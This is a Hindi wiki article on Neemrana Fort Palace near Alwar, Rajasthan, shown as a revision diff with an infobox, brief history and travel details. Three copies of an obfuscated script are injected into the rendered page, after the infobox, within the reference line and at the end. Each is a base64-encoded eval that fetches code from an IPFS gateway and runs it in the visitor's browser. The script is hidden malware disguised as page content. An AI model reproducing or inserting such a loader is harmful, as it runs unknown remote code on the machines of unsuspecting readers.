Difference between revisions of "नीमराना फ़ोर्ट पैलेस अलवर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (नीमराना फोर्ट पैलेस अलवर का नाम बदलकर नीमराना फ़ोर्ट पैलेस अलवर कर दिया गया है)
 
(10 intermediate revisions by 4 users not shown)
Line 1: Line 1:
[[चित्र: Neemrana-Fort-Palace-Alwar-1.jpg|250 px|नीमराना फ़ोर्ट पैलेस, [[अलवर]]<br />  Neemrana Fort Palace, Alwar|thumb]]
+
{{सूचना बक्सा पर्यटन
*[[राजस्थान]] के शहर [[अलवर]] में कई [[अलवर पर्यटन|पर्यटन स्थल]] जिनमें से नीमराना फोर्ट पैलेस एक है।  
+
|चित्र=Neemrana-Fort-Palace-Alwar-1.jpg
*सन 1464 में स्थापित नीमराना फोर्ट पैलेस देश के कुछ प्राचीनतम हेरिटेज रिजॉर्ट्स में से एक है।  
+
|विवरण=नीमराना फ़ोर्ट पैलेस [[राजस्थान]] के [[अलवर]] शहर में स्थित है।
 +
|राज्य=[[राजस्थान]]
 +
|ज़िला=[[अलवर ज़िला|अलवर]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल= सन् 1464
 +
|स्थापना=
 +
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=27.988889,76.388333&ll=27.990233,76.392145&spn=0.035394,0.055189&t=m&z=14&vpsrc=6 उत्तर- 27° 59' 20.00" - पूर्व- 76° 23' 18.00"]
 +
|मार्ग स्थिति=नीमराना फ़ोर्ट पैलेस अलवर से 75 किमी की दूरी पर स्थित है।
 +
|प्रसिद्धि=
 +
|कब जाएँ=[[अक्टूबर]] से [[मार्च]]
 +
|यातायात=ऑटो-रिक्शा और टैक्सी
 +
|हवाई अड्डा=जयपुर अंतरराष्ट्रीय हवाई अड्डा
 +
|रेलवे स्टेशन=अलवर जंक्शन
 +
|बस अड्डा=जनरल बस अड्डा
 +
|कैसे पहुँचें=
 +
|क्या देखें= राज कुंड
 +
|कहाँ ठहरें=होटल, गेस्ट हाउस
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=0144
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=neemrana+fort+palace+alwar&daddr=City+Palace,+Alwar,+Rajasthan&hl=en&ll=27.781987,76.455231&spn=0.567395,0.883026&sll=27.941034,76.441498&sspn=0.566563,0.883026&geocode=FWAnqwEdTJiNBCHu9RmKGBZzOg%3BFVGvpAEdNLuQBCm_GYPvdZlyOTFF6WNWEp3WhA&vpsrc=0&mra=ls&t=m&z=10 गूगल मानचित्र]
 +
|संबंधित लेख=[[बाला क़िला अलवर|बाला क़िला]], [[सरिस्का राष्ट्रीय उद्यान]], [[सिटी पैलेस अलवर|सिटी पैलेस]]
 +
|पाठ 1=[[हिन्दी]], [[अंग्रेज़ी भाषा|अंग्रेज़ी]] और [[राजस्थानी भाषा|राजस्थानी]]
 +
|शीर्षक 1=[[भाषा]]
 +
|पाठ 2=
 +
|शीर्षक 2=
 +
|अन्य जानकारी= 
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''नीमराना फोर्ट पैलेस''' [[राजस्थान]] के शहर [[अलवर]] में कई [[अलवर पर्यटन|पर्यटन स्थलो]] में से एक है। सन् 1464 में स्थापित नीमराना फोर्ट पैलेस देश के कुछ प्राचीनतम हेरिटेज रिजॉर्ट्स में से एक है।  
 
*पृथ्वीराज चौहान तृतीय की तीसरी राजधानी नीमराना क़िला [[दिल्ली]] [[जयपुर]] हाइवे पर स्थित है और 25 एकड़ क्षेत्र में फैला है।  
 
*पृथ्वीराज चौहान तृतीय की तीसरी राजधानी नीमराना क़िला [[दिल्ली]] [[जयपुर]] हाइवे पर स्थित है और 25 एकड़ क्षेत्र में फैला है।  
 
*दस लेवल पर बना यह भव्य क़िला बाहर से देखने में मनमोहक है लेकिन क़िला के अंदर से बाहर का नज़ारा उससे भी अधिक आकर्षक लगता है।  
 
*दस लेवल पर बना यह भव्य क़िला बाहर से देखने में मनमोहक है लेकिन क़िला के अंदर से बाहर का नज़ारा उससे भी अधिक आकर्षक लगता है।  
*राजस्थान के अलवर जिले में अरावली क्षेत्र के नीमराना गांव में स्थित यह क़िला पर्यटकों को आकर्षित करता है।<ref>{{cite web |url=http://www.livehindustan.com/news/lifestyle/lifestylenews/50-50-122626.html |title=देश के 10 प्रसिद्ध हेरिटेज होटल  |accessmonthday=[[7 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format=एच टी एम एल |publisher=हिन्दुस्तान |language=हिन्दी}}</ref>
+
*राजस्थान के अलवर ज़िले में अरावली क्षेत्र के नीमराना गांव में स्थित यह क़िला पर्यटकों को आकर्षित करता है।<ref>{{cite web |url=http://www.livehindustan.com/news/lifestyle/lifestylenews/50-50-122626.html |title=देश के 10 प्रसिद्ध हेरिटेज होटल  |accessmonthday=[[7 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=हिन्दुस्तान |language=[[हिन्दी]]}}</ref>
{{लेख प्रगति
+
[[चित्र:Neemrana-Fort-Palace-1.jpg|नीमराना फोर्ट पैलेस, [[अलवर]]|thumb|left]]
|आधार=
+
[[चित्र:Neemrana-Fort-4.jpg|नीमराना फोर्ट पैलेस, [[अलवर]]|thumb|left]]
|प्रारम्भिक=प्रारम्भिक1
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
|माध्यमिक=
+
==वीथिका==
|पूर्णता=
+
<gallery>
|शोध=
+
चित्र:Neemrana-Fort-Palace.jpg|नीमराना फोर्ट पैलेस, [[अलवर]]
}}
+
चित्र:Neemrana-Fort-Palace-2.jpg|नीमराना फोर्ट पैलेस, [[अलवर]]
 +
चित्र:Neemrana-Fort-Palace-Alwar-5.jpg|नीमराना फोर्ट पैलेस
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:59, 27 July 2017

nimarana fort pailes alavar
vivaran nimarana fort pailes rajasthan ke alavar shahar mean sthit hai.
rajy rajasthan
zila alavar
nirman kal sanh 1464
bhaugolik sthiti uttar- 27° 59' 20.00" - poorv- 76° 23' 18.00"
marg sthiti nimarana fort pailes alavar se 75 kimi ki doori par sthit hai.
kab jaean aktoobar se march
havaee adda jayapur aantararashtriy havaee adda
relave steshan alavar jankshan
bas adda janaral bas adda
yatayat aauto-riksha aur taiksi
kya dekhean raj kuand
kahaan thaharean hotal, gest haus
es.ti.di. kod 0144
e.ti.em lagabhag sabhi
chitr:Map-icon.gif googal manachitr
sanbandhit lekh bala qila, sariska rashtriy udyan, siti pailes bhasha hindi, aangrezi aur rajasthani

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

nimarana phort pailes rajasthan ke shahar alavar mean kee paryatan sthalo mean se ek hai. sanh 1464 mean sthapit nimarana phort pailes desh ke kuchh prachinatam heritej rij aaurts mean se ek hai.

  • prithviraj chauhan tritiy ki tisari rajadhani nimarana qila dilli jayapur haive par sthit hai aur 25 ek d kshetr mean phaila hai.
  • das leval par bana yah bhavy qila bahar se dekhane mean manamohak hai lekin qila ke aandar se bahar ka nazara usase bhi adhik akarshak lagata hai.
  • rajasthan ke alavar zile mean aravali kshetr ke nimarana gaanv mean sthit yah qila paryatakoan ko akarshit karata hai.[1]

[[chitr:Neemrana-Fort-Palace-1.jpg|nimarana phort pailes, alavar|thumb|left]] [[chitr:Neemrana-Fort-4.jpg|nimarana phort pailes, alavar|thumb|left]]

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

  1. desh ke 10 prasiddh heritej hotal (hindi) (ech.ti.em.el) hindustan. abhigaman tithi: 7 aktoobar, 2010.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>